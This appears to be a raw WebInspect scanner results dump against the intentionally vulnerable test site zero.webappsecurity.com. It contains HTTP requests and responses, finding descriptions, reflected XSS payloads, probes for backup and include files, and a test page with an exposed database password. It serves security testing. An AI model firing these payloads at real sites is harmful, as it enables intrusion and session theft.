Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:02 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:00 GMT
ETag: "be7c48f8a9dc11:8f6"
Content-Length: 15
my include fileInclude File (common.inc)An include file was found. Include files can contain usernames and passwords as well as sensitive information pertaining to the application and system.GET /include/<attack>common.inc</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /_vti_log/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_log/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_log/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /pindex.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:52 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT
ETag: "208026c0a8dc11:8f6"
Content-Length: 2061
<html>
<body>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
This page allows for testing of pareters.<br>
<br>
The first section shows how a combo box can be used to product optional pages<br>
<form action = pcomboindex.asp method=post>
<SELECT name=cboPage>
<OPTION selected value=pc1>Show Page One</OPTION>
<option value=pc2>Show Page Two</option>
<option value=pc3>Show page three</option>
</select><br>
<input type=submit value=Submit>
</form><br>
<hr>
<a href="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</a><br>
<br>
<A href="error.html">My ERROR</A>
Third example allows the user to input values and then shows them on the following page<br>
<Form action="pformresults.asp" method=post>
First Name: <input type=text name=txtFirstName><br>
Last Name: <input type=text name=txtLastName><br>
<input type=hidden name=txtHidden value="This was hidden from the user">
<input type=hidden name=dbConnectString value="dbCCNumbers;uid=sa;password=scoobydo">
<input type=submit value="Show User Input results"><br>
</form><br>
<hr>
<form action="rootlogin.asp" method=post>
User Name:<input type=text name=txtName><br>
Pass phrase:<input type=text name=txtPassPhrase><br>
<input type=submit value="Login"><br>
</form>
<br>
False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh
<br>
False Keyword that should not be flagged: An error has occurred
<br>
<br>
<br>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A>
<br>
<A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A>
<br>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A>
<br>
<A HREF="/linking/index.htm">Several chained directories</A>
<br>
<A HREF="/cfmerror.html">Cold Fusion Error</A>
<br>
<A HREF="/admin/help.cgi">Help</A>
<br>
<A HREF="/aspnet.aspx">ASP.NET file</A>
</body>
</html>
Backup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /pindex.asp<attack>.bak</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream GET /pindex.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:52 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:17 GMT
ETag: "208026c0a8dc11:8f6"
Content-Length: 2061
<html>
<body>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
This page allows for testing of pareters.<br>
<br>
The first section shows how a combo box can be used to product optional pages<br>
<form action = pcomboindex.asp method=post>
<SELECT name=cboPage>
<OPTION selected value=pc1>Show Page One</OPTION>
<option value=pc2>Show Page Two</option>
<option value=pc3>Show page three</option>
</select><br>
<input type=submit value=Submit>
</form><br>
<hr>
<a href="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</a><br>
<br>
<A href="error.html">My ERROR</A>
Third example allows the user to input values and then shows them on the following page<br>
<Form action="pformresults.asp" method=post>
First Name: <input type=text name=txtFirstName><br>
Last Name: <input type=text name=txtLastName><br>
<input type=hidden name=txtHidden value="This was hidden from the user">
<input type=hidden name=dbConnectString value="dbCCNumbers;uid=sa;password=scoobydo">
<input type=submit value="Show User Input results"><br>
</form><br>
<hr>
<form action="rootlogin.asp" method=post>
User Name:<input type=text name=txtName><br>
Pass phrase:<input type=text name=txtPassPhrase><br>
<input type=submit value="Login"><br>
</form>
<br>
False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh
<br>
False Keyword that should not be flagged: An error has occurred
<br>
<br>
<br>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A>
<br>
<A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A>
<br>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A>
<br>
<A HREF="/linking/index.htm">Several chained directories</A>
<br>
<A HREF="/cfmerror.html">Cold Fusion Error</A>
<br>
<A HREF="/admin/help.cgi">Help</A>
<br>
<A HREF="/aspnet.aspx">ASP.NET file</A>
</body>
</html>
Application Error MessageA web application error message was found. An error message indicates that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has recieved user input that it did not expect and doesn't know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
error\shas\soccurred Or DB4Web\sClient\s-\sModul Not Generated\sby\sjavadocGET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=1"style="background:url(javascript:alert('XSS'))"%20"&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:26 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /pindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1771
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
</P>
<A HREF="sldjfsld;jsdl;kjfsdl;fj">Invalid link</A>
<a href="/cookietest/">A cookie test page</a><br>
<A HREF="http://www.spidynamics.com:34/login.asp">Timeout Link</A>
<A HREF="/auth/">Protected Page</A>
</BODY>
</HTML>Application Error MessageA web application error message was found. An error message indicates that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has recieved user input that it did not expect and doesn't know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
error\shas\soccurred Or DB4Web\sClient\s-\sModul Not Generated\sby\sjavadocGET /pindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1771
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
</P>
<A HREF="sldjfsld;jsdl;kjfsdl;fj">Invalid link</A>
<a href="/cookietest/">A cookie test page</a><br>
<A HREF="http://www.spidynamics.com:34/login.asp">Timeout Link</A>
<A HREF="/auth/">Protected Page</A>
</BODY>
</HTML>Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /join.asp?name=>"'><img%20src="javascript:alert('XSS')">&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
